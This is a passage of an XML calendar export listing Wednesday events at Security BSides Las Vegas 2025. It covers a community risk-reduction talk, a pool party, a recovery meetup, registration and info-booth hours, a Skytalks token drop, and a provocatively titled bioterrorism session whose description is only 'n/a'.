            <description>This portion of the event is focused on no-kidding short-term measures to take to reduce risk. We have discussed water, urgent and emergency care, energy, public safety, and household resilience. 

What actions can you take this month to protect your community, your family, yourself? What about next month? What about October? Ongoing, incremental steps can materially reduce risk.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/WFYFWE/</url>
            <location>Copa</location>
            
            <attendee>Josh Corman</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>PFRLVK@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-PFRLVK</pentabarf:event-slug>
            <pentabarf:title>BSides Pool Party</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T210000</dtstart>
            <dtend>20250807T030000</dtend>
            <duration>060000</duration>
            <summary>BSides Pool Party</summary>
            <description>BSides Pool Party</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event6HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/PFRLVK/</url>
            <location>Pool</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>D83EH8@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-D83EH8</pentabarf:event-slug>
            <pentabarf:title>Recovery Hackers, Wednesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T193000</dtstart>
            <dtend>20250806T213000</dtend>
            <duration>020000</duration>
            <summary>Recovery Hackers, Wednesday</summary>
            <description>Not a formal 12-step meeting. Rather, a supportive gathering for folks taking Summer Camp one day at a time. Monday, Tuesday and Wednesday, 19:30-21:30 in G103. Look for the sign on a patio on the pool side of building G and enter through the patio door.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event2HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/D83EH8/</url>
            <location>G-103</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>NZA8EH@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-NZA8EH</pentabarf:event-slug>
            <pentabarf:title>Info Booth Opens, Wednesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T070000</dtstart>
            <dtend></dtend>
            <duration>000000</duration>
            <summary>Info Booth Opens, Wednesday</summary>
            <description>Info Booth Opens, Wednesday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/NZA8EH/</url>
            <location>Hallway</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>UJBZWE@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-UJBZWE</pentabarf:event-slug>
            <pentabarf:title>Registration Opens, Wednesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T080000</dtstart>
            <dtend></dtend>
            <duration>000000</duration>
            <summary>Registration Opens, Wednesday</summary>
            <description>Registration Opens, Wednesday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/UJBZWE/</url>
            <location>Hallway</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>CMTLQN@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-CMTLQN</pentabarf:event-slug>
            <pentabarf:title>Skytalks Token Drop 5</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T090000</dtstart>
            <dtend>20250806T100000</dtend>
            <duration>010000</duration>
            <summary>Skytalks Token Drop 5</summary>
            <description>Skytalks Token Drop 5
Skytalks token distribution for Wednesday MORNING sessions (10:00-12:00)
Queue in Tuscany Hallway between Middle Ground and Speaker Room.
Tokens are limited in number, and distribution ends when they are gone.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/CMTLQN/</url>
            <location>Hallway</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>DLKXPU@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-DLKXPU</pentabarf:event-slug>
            <pentabarf:title>Registration Closes, Wednesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T110000</dtstart>
            <dtend>20250806T110000</dtend>
            <duration>000000</duration>
            <summary>Registration Closes, Wednesday</summary>
            <description>Registration Closes, Wednesday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/DLKXPU/</url>
            <location>Hallway</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>BPC3MD@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-BPC3MD</pentabarf:event-slug>
            <pentabarf:title>Info Booth Closes, Wednesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T160000</dtstart>
            <dtend>20250806T160000</dtend>
            <duration>000000</duration>
            <summary>Info Booth Closes, Wednesday</summary>
            <description>Info Booth Closes, Wednesday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/BPC3MD/</url>
            <location>Hallway</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>MEGNEQ@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-MEGNEQ</pentabarf:event-slug>
            <pentabarf:title>Advanced BioTerrorism Methods for the Discerning Practitioner (Token 13)</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T100000</dtstart>
            <dtend>20250806T114500</dtend>
            <duration>014500</duration>
            <summary>Advanced BioTerrorism Methods for the Discerning Practitioner (Token 13)</summary>
            <description>n/a</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event2HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/MEGNEQ/</url>
            <location>Misora</location>
            
            <attendee>Dr. Mixael S. Laufer</attendee>
            
        </vevent>
        
    </vcalendar>
</iCalendar>
